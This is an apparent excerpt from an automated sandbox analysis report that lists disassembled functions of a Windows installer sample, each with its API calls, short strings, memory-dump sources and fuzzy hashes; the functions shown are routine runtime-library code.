                              • Instruction Fuzzy Hash: 4441CA33B40649ABDB019BB8CC82BCE7B79AF49328F140511E864E7B90D735D8454F69
                              Function 6C33E418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C33E41D
                                • Part of subcall function 6C33EE40: __EH_prolog.LIBCMT ref: 6C33EE45
                                • Part of subcall function 6C33E8EB: __EH_prolog.LIBCMT ref: 6C33E8F0
                                • Part of subcall function 6C33E593: __EH_prolog.LIBCMT ref: 6C33E598
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: e61f8d6abea9ab04b3d33873ebf2851d68d88a28348c7ae7dc39474414c2feec
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: 2B217971D05398AECB08DBE4D9859EDBBB4AF25318F204029E45667B81DB781E0CCF62
                              Function 6C2EF12A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C2EF1B4,?,?,6C2EF235,?,?,?), ref: 6C2EF13F
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C2EF152
                              • FreeLibrary.KERNEL32(00000000,?,?,6C2EF1B4,?,?,6C2EF235,?,?,?), ref: 6C2EF175
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: ffc521f1497b691c3fb81d2429bc178d3ae9cecb261593d8e9932ee48e45fc09
                              • Instruction ID: 6410b3b0427898d726cc283e8cd46de3184b9f94f85785bec1868c261c37f4e4
                              • Opcode Fuzzy Hash: ffc521f1497b691c3fb81d2429bc178d3ae9cecb261593d8e9932ee48e45fc09
                              • Instruction Fuzzy Hash: 7DF08C3160151EFFDF02AB94D90AF9F7A7DEB0935AF210060F801B6850CB348E00DB90
                              Function 6C2E7327 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog3.LIBCMT ref: 6C2E732E
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C2E7339
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C2E73A7
                                • Part of subcall function 6C2E7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C2E7248
                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C2E7354
                              • _Yarn.LIBCPMT ref: 6C2E736A
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                              • String ID:
                              • API String ID: 1088826258-0
                              • Opcode ID: cd46a9be0f4a52c637ff6245aec7f8f9a6b38290cc3589753926701f8e04bdf2
                              • Instruction ID: cc226c813334817c7a28bc671df75c39d0d1a78f15c21b19f6f707fc81ecfd5e
                              • Opcode Fuzzy Hash: cd46a9be0f4a52c637ff6245aec7f8f9a6b38290cc3589753926701f8e04bdf2
                              • Instruction Fuzzy Hash: F701BC75A006299BCB45DF60C850ABC37B6FF8E604B55400ADD11A7780CF34AE46CFC1
                              Function 6C366E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: 464fcd1052c5891a87ac897557b1005749a81b1dc155ac9832449f96aba9fb6e
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: F112AF70D11249DFCB04CFA5C480ADDBBB1BF09308F64806AE885ABF59DB31A945CFA1
                              Function 6C332B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: 7fb2c163e415d0a462c15967dc4695982d2726443927a391161c7b8ea1dc38fe
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: E1B19E71D002599FCB14CF95C9849EEBBB1FF48318B20852EE45AA7B51C732AA45CF90
                              Function 6C1B2020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 6C2E7327: __EH_prolog3.LIBCMT ref: 6C2E732E
                                • Part of subcall function 6C2E7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C2E7339
                                • Part of subcall function 6C2E7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C2E7354
                                • Part of subcall function 6C2E7327: _Yarn.LIBCPMT ref: 6C2E736A
                                • Part of subcall function 6C2E7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C2E73A7
                                • Part of subcall function 6C1B2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2F95
                                • Part of subcall function 6C1B2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2FAF
                                • Part of subcall function 6C1B2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B2FD0
                                • Part of subcall function 6C1B2F60: __Getctype.LIBCPMT ref: 6C1B3084
                                • Part of subcall function 6C1B2F60: std::_Facet_Register.LIBCPMT ref: 6C1B309C
                                • Part of subcall function 6C1B2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B30B7
                              • std::ios_base::_Addstd.LIBCPMT ref: 6C1B211B
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 3332196525-1866435925
                              • Opcode ID: aa3be50824338dfab74b63f2eba8477ad73dd63bc5e07f08ea9acfe446271731
                              • Instruction ID: b8004dad20ea71f42f35726efd3d615019171114289cfbf0e385cb89d8a020a5
                              • Opcode Fuzzy Hash: aa3be50824338dfab74b63f2eba8477ad73dd63bc5e07f08ea9acfe446271731
                              • Instruction Fuzzy Hash: FF41B0B0E003098FDB04CF64C8457AABBB1FF49318F148268E919AB791E775D989CF90
                              Function 6C344EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C344ECC
                                • Part of subcall function 6C32F58A: __EH_prolog.LIBCMT ref: 6C32F58F
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: 68d216eacf6b67cb2bb132997cbe193b728d05f9c6c2cc75bbcb1499c1391e92
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: 8F21B5B0805B40CFC764CF6AC14428ABBF4BB2A708B10895EC0EA97F11D7B8A609CF55
                              Function 6C2FAD90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C2FB0D0,6C1B1DEA,00008000,6C2FB0D0,?,?,?,6C2FAC7F,6C2FB0D0,?,00000000,6C1B1DEA), ref: 6C2FADC9
                              • GetLastError.KERNEL32(?,?,?,6C2FAC7F,6C2FB0D0,?,00000000,6C1B1DEA,?,6C30469E,6C2FB0D0,000000FF,000000FF,00000002,00008000,6C2FB0D0), ref: 6C2FADD3
                              • __dosmaperr.LIBCMT ref: 6C2FADDA
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer__dosmaperr
                              • String ID: 8Q
                              • API String ID: 2336955059-4022487301
                              • Opcode ID: 0b2d1595de0d0b9fad585405bfcc790975a28840b752e102bde5c9aed082771b
                              • Instruction ID: 765f3e4e1f212d603186516412461f84c234d392754b953e850060b606c26515
                              • Opcode Fuzzy Hash: 0b2d1595de0d0b9fad585405bfcc790975a28840b752e102bde5c9aed082771b
                              • Instruction Fuzzy Hash: 9C01D83775151DAFCF058F6ADC059DE7B2DEB86326B240209FC619B680EB71D9028BA0
                              Function 6C2E6AFD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C3E466C,?,652EF5AA,6C1B230E,6C3E430C), ref: 6C2E6B07
                              • ReleaseSRWLockExclusive.KERNEL32(6C3E466C), ref: 6C2E6B3A
                              • WakeAllConditionVariable.KERNEL32(6C3E4668), ref: 6C2E6B45
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                              • String ID: lF>l
                              • API String ID: 1466638765-560091355
                              • Opcode ID: 3708d66783377c56a785e006bda196c098d0e5448e595703955e8c486ed32bb6
                              • Instruction ID: bad783e480be38666929e08d11b02833676f0a96c0e139c4af57c8822033ccb7
                              • Opcode Fuzzy Hash: 3708d66783377c56a785e006bda196c098d0e5448e595703955e8c486ed32bb6
                              • Instruction Fuzzy Hash: 95F039B8601524DFCB55EF99E849D947BBCEB4E315B01806BF90687B01CB30A801CFA4
                              Function 6C2F49B2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,6C2EEF64,6C316DD8,0000000C), ref: 6C2F49B7
                              • _free.LIBCMT ref: 6C2F4A14
                              • _free.LIBCMT ref: 6C2F4A4A
                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C2EEF64,6C316DD8,0000000C), ref: 6C2F4A55
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 3adb2cae14dd8bfcf4d7aeccad4b2551fdc1172b98148e2564236fce8dcfd868
                              • Instruction ID: 5769886257334cb0fea8f955991a2aecdcace60dddbad56993c4e89594a0b7d3
                              • Opcode Fuzzy Hash: 3adb2cae14dd8bfcf4d7aeccad4b2551fdc1172b98148e2564236fce8dcfd868
                              • Instruction Fuzzy Hash: 8211E33338410D6BEA415AB98ED4D9AA16DDBC677DB250229FD34A2F90DFB18C0B4624
                              Function 6C305EBA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,?,6C3046EC,00000000,00000000,?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0), ref: 6C305ED1
                              • GetLastError.KERNEL32(?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?,6C2FB0D0,?,6C2FBD1C,6C305AB6), ref: 6C305EDD
                                • Part of subcall function 6C305F2E: CloseHandle.KERNEL32(FFFFFFFE,6C305EED,?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?,6C2FB0D0), ref: 6C305F3E
                              • ___initconout.LIBCMT ref: 6C305EED
                                • Part of subcall function 6C305F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C305EAB,6C304B3E,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?), ref: 6C305F22
                              • WriteConsoleW.KERNEL32(00000000,?,6C3046EC,00000000,?,6C304B51,00000000,00000001,00000000,6C2FB0D0,?,6C2FC286,?,?,6C2FB0D0,?), ref: 6C305F02
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 53891ef32860d85367e4419e2be6fe886a78bbe28f7e642dd308dc96aa1b7afa
                              • Instruction ID: e356c70ef1608dc148e1ab60cda137268eec426add32d20e6a6150309e430dd8
                              • Opcode Fuzzy Hash: 53891ef32860d85367e4419e2be6fe886a78bbe28f7e642dd308dc96aa1b7afa
                              • Instruction Fuzzy Hash: 85F03037600215FFCF621FA1DC049993F3AFF497A5B084010FA1986620CB328820DF95
                              Function 6C2F3124 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog3_
                              • String ID: 8Q
                              • API String ID: 2427045233-4022487301
                              • Opcode ID: cc7e14e582b0cb27f4e2bb1255be87b1c72edad2b6bd7c8c9dff20be75140bd4
                              • Instruction ID: dc5c14747b919372234ce3d23a7de2adb3af01c0c61f5bee1776fa2eaeb2a41a
                              • Opcode Fuzzy Hash: cc7e14e582b0cb27f4e2bb1255be87b1c72edad2b6bd7c8c9dff20be75140bd4
                              • Instruction Fuzzy Hash: 3C71A475D8521E9BEB10CF95C880AEEFAB5BF05319F144215EC30A7A40DBB59847CBA2
                              Function 6C338C58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C338C5D
                                • Part of subcall function 6C33761A: __EH_prolog.LIBCMT ref: 6C33761F
                                • Part of subcall function 6C337A2E: __EH_prolog.LIBCMT ref: 6C337A33
                                • Part of subcall function 6C338EA5: __EH_prolog.LIBCMT ref: 6C338EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: df42eefd7b186b932e85b0e83ee10d999dc3bc7e77dd3aed5b07753ccd78fb91
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 25815A31D00259DFCF15DFA4D990ADDB7B4AF19318F1040AAE456B7B90DB306A49CF62
                              Function 6C1B28E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                              Download Yara Rule
                              APIs
                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C1B2A76
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ___std_exception_destroy
                              • String ID: Jbx$Jbx
                              • API String ID: 4194217158-1161259238
                              • Opcode ID: 14a9491efc416fefd137aa9905780731d22caf711794727c61928d7a18a19ef1
                              • Instruction ID: 8f38b27bc0cb8144fd69327ec0a88f51a7a9ddb3a16c748213ecd37ca9b4e48c
                              • Opcode Fuzzy Hash: 14a9491efc416fefd137aa9905780731d22caf711794727c61928d7a18a19ef1
                              • Instruction Fuzzy Hash: B85127B1D002049FCB10CF68C89469EBBB5EF89314F15856DE949EBB41D335E989CF91
                              Function 6C3665B2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: cf3ad13e8fb40c25ead6aacbc5c0f9d08527fc9f8d0e0897fb9fc1dea345e610
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: 4E51BD75A00305DFDB00CFA6C8C4BEEB7B5FB88398F148529D901EBA49DB75A9058F61
                              Function 6C2FCEFE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C3046D6), ref: 6C2FD01B
                              • __dosmaperr.LIBCMT ref: 6C2FD022
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr
                              • String ID: 8Q
                              • API String ID: 1659562826-4022487301
                              • Opcode ID: cf0d0e710a4be9f2e307119373dd7d304439451a13bc29b6236027070b4d3eaa
                              • Instruction ID: 185e5c1ac8dc54cb86e8cb5a06c60b9e4e05d3905c64c96344982959fa430f35
                              • Opcode Fuzzy Hash: cf0d0e710a4be9f2e307119373dd7d304439451a13bc29b6236027070b4d3eaa
                              • Instruction Fuzzy Hash: 4341867165419DAFE721AF28C880BA9FFA4EB4A718F14435AFCA08B641D7719807C790
                              Function 6C354C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
